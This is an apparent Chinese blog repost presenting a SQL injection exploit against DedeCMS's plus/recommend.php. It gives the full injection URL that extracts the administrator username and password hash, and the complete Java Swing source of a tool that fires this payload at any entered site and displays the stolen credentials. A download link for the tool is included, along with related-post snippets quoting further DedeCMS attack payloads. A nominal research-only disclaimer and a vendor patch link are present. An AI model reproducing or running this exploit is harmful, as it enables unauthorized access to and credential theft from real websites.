dedecms recommend.php注入利用,DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日...

最新推荐文章于 2024-03-15 01:22:27 发布
最新推荐文章于 2024-03-15 01:22:27 发布
阅读量93 收藏
点赞数
文章标签: dedecms recommend.php注入利用

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。

4e13b00c6db374f08a15d9fd130db950.png

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

EXP:

复制代码代码如下:

http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示

d8f1e6a374510113fbd1d62b1e570957.gif

利用工具源码(by 园长):

复制代码代码如下:

package org.javaweb.dede.ui;

import java.awt.Toolkit;

import java.io.BufferedReader;

import java.io.InputStreamReader;

import java.net.URL;

import java.util.regex.Matcher;

import java.util.regex.Pattern;

/**

*

* @author yz

*/

public class MainFrame extends javax.swing.JFrame {

private static final long serialVersionUID = 1L;

/**

* Creates new form MainFrame

*/

public MainFrame() {

initComponents();

}

public String request(String url){

String str = "",tmp;

try {

BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));

while((tmp=br.readLine())!=null){

str+=tmp+"\r\n";

}

} catch (Exception e) {

jTextArea1.setText(e.toString());

}

return str;

}

private void initComponents() {

jPanel1 = new javax.swing.JPanel();

jLabel1 = new javax.swing.JLabel();

jTextField1 = new javax.swing.JTextField();

jButton1 = new javax.swing.JButton();

jScrollPane1 = new javax.swing.JScrollPane();

jTextArea1 = new javax.swing.JTextArea();

setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);

jLabel1.setText("URL:");

jTextField1.setText("http://localhost");

this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");

int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;

int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;

this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);

jButton1.setText("获取");

jButton1.addActionListener(new java.awt.event.ActionListener() {

public void actionPerformed(java.awt.event.ActionEvent evt) {

jButton1ActionPerformed(evt);

}

});

jTextArea1.setColumns(20);

jTextArea1.setRows(5);

jScrollPane1.setViewportView(jTextArea1);

javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);

jPanel1.setLayout(jPanel1Layout);

jPanel1Layout.setHorizontalGroup(

jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addGroup(jPanel1Layout.createSequentialGroup()

.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)

.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)

.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()

.addContainerGap()

.addComponent(jLabel1)

.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)

.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)

.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)

.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))

.addGap(0, 0, Short.MAX_VALUE))

);

jPanel1Layout.setVerticalGroup(

jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addGroup(jPanel1Layout.createSequentialGroup()

.addContainerGap()

.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)

.addComponent(jLabel1)

.addComponent(jTextField1,

javax.swing.GroupLayout.PREFERRED_SIZE,

javax.swing.GroupLayout.DEFAULT_SIZE,

javax.swing.GroupLayout.PREFERRED_SIZE)

.addComponent(jButton1))

.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)

.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))

);

javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());

getContentPane().setLayout(layout);

layout.setHorizontalGroup(

layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)

);

layout.setVerticalGroup(

layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)

);

pack();

}//

private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {

String url = jTextField1.getText();

if(null==url||"".equals(url)){

return ;

}

String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");

Matcher m = Pattern.compile("

(.*)

").matcher(result);

if(m.find()){

String[] s = m.group(1).split("\\|");

if(s.length>2){

jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));

}

}

}

public static void main(String args[]) {

java.awt.EventQueue.invokeLater(new Runnable() {

public void run() {

new MainFrame().setVisible(true);

}

});

}

// Variables declaration - do not modify

private javax.swing.JButton jButton1;

private javax.swing.JLabel jLabel1;

private javax.swing.JPanel jPanel1;

private javax.swing.JScrollPane jScrollPane1;

private javax.swing.JTextArea jTextArea1;

private javax.swing.JTextField jTextField1;

// End of variables declaration

}

利用工具下载地址 http://pan.baidu.com/s/1i37LUnF (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)

604a5747b4960155c996b8b5650b2da4.png

dedecms官方补丁地址: http://www.dedecms.com/pl/

weixin_39765100
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
织梦漏洞超级利用工具
07-03
软件功能非常强大,懂的人可以拿去测试呵呵,不懂的人,你也就OUT了!~~
渗透实战:dedeCMS任意用户密码重置到内网getshell
niobi的博客
05-05 1855
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
DedeCMS(CVE-2019-8933)
最新发布
m0_74559567的博客
03-15 531
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
织梦漏洞利用
weixin_53210070的博客
12-14 1476
Dedecms网站建立 php打开网站,开始安装 漏洞利用原理 dedecms系统中使用了SQL语句防注入功能引了的安警告。在自定义模模型中使用了union|sleep|benchmark|load_file|outfile之一都会引发这个警告,此外采集的内容,如果有‘union 这类语法也会出现在这个警告。解决办法就是把安检查关掉,打开include下面的dedesql.class.php 和dedesqli.class.php,$this->...
织梦search.php,DeDecms最新plus/search.php漏洞批量利用工具
weixin_39829236的博客
03-09 520
获取密码网址/plus/search.php?typeArr[1'or `@\'`=1 and (SELECT 1 FROM (selectcount(*),concat(floor(rand(0)*2),(substring((Select pwd fromdede_admin limit 1,1),1,62)))a from information_schema.tables groupby ...
dedecms recommend.php注入利用,DedeCMS recommend.php文件通杀SQL注入漏洞利用代码工具...
weixin_42300398的博客
03-11 316
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近,网友在dedecms中发现了版本通杀SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:EXP:Exp:plus/recommend.php?action=&aid=1&_F...
Configs_NeverNever_nubilefilms.com_NuBlLEFlLMS、COm_loli/anom_nub
10-04
The RTS/CTS mechanism which is included in the legacy ns-802.11model has never been tested and verified. Therefore we do notrecommend to use RTS/CTS without reviewing the code in detail.
recommend.zip_Recommend算法_推荐数据集_推荐算法_电商
07-15
机器学习入门经典算法中的推荐算法,各大电商网站必备算法,内含数据集。
gaokao-recommend.zip
11-15
gaokao-recommend.zip高考推荐系统ruoyi
recommend-system.py
08-21
代码主要包含常见几种相似度计算方法,基于用户的协同过滤推荐。
Ansible-hot-word-recommend.zip
09-18
Ansible-hot-word-recommend.zip,用openresty和redis推荐热词的实验,ansible是一个简单而强大的自动化引擎。它用于帮助配置管理、应用程序部署和任务自动化。
织梦最新通杀利用工具.exe
06-01
hacker,织梦 一款可以通杀织梦的攻击工具
php上传漏洞利用工具下载,DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)
weixin_34044889的博客
03-16 319
DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)一、漏洞描述织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的uploads/include/dialog/select_images_post.php文件存在文件上传漏洞,远程攻击者可以利用该漏洞上传并执行任意PHP代码。该漏洞利用条件:1、需要开发会员注册功能 ...
DedecmsV5.7任意代码执行漏洞复现(靶场及工具已打包)
爱国小白帽
12-29 2402
声明:本文介绍的技术仅供网络安技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安机关处理,著作权归爱国小白帽所有 准备 靶场及工具打包在公众号,回复“dede”领取,也可单独下载 dedecmsV5.7靶机源码 冰蝎3.0window版 可公网访问的云端服务器(如果没有可用本地虚拟机模拟) phpstudy D盾(次要) FinalShell(次要) 首先将靶机解压,进入install目录,将install_lock.txt文件删除,inde.
safe6出品 dedecms(织梦)漏洞辅助检测工具
safe6
07-12 6075
注意我的说的漏洞辅助检测工具,并不是真的漏洞检测。目前支持dedecms 5.7、5.6、5.5、5.1、5.3、5.0功能:很简单就是dedecms各个版本出现过漏洞的页面,进行批量检测文件是否存在而已。并不是检测poc!!!!使用:需要jdk,需要配置java环境需要其他功能,可以联系我添加。软件仅供技术交流,请勿用于商业及非法用途,如产生法律纠纷与本人无关! www.safe6.c链接:ht...
织梦dedecms漏洞修复大全(5.7起)
weixin_30472035的博客
12-30 766
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复。修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记得先备份),这样的好处是防止用懒人包上传之后因为UTF8和GBK不同产生乱码,或者修改过这几个文件,然后直接修改的部分被替换掉,那之前就白改了,找起来也非常的麻烦。如果你搜索不到,...
plusrecommend.php,DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析 | 学步园
weixin_42508792的博客
03-11 423
漏洞执行过程1.首先执行到plus/recommand.php,包含了include/common.inc.phprequire_once(dirname(__FILE__)."/../include/common.inc.php");2来看到include/common.inc.phpfunction _RunMagicQuotes(&$svar){if(!get_magic_quote...
dedecms recommend.php注入利用工具,DedeCMS版本通杀SQL注入漏洞利用代码工具
weixin_35140642的博客
03-18 533
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近,网友在dedecms中发现了版本通杀SQL注入漏洞,目前官方最新版已修复该漏洞,相关...
BNRoutePlanInfos routePlaneInfos = BaiduNaviManagerFactory.getRoutePlanManager() .getRoutePlanInfo(); 这段代码为空应该怎么写
05-24
如果该段代码返回的是空值,你可以在获取 `BNRoutePlanInfos` 对象之前先进行路线规划操作。例如: ``` // 创建起点和终点 BNaviPoint startPoint = new BNaviPoint(startLng, startLat, "起点", BNaviPoint....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值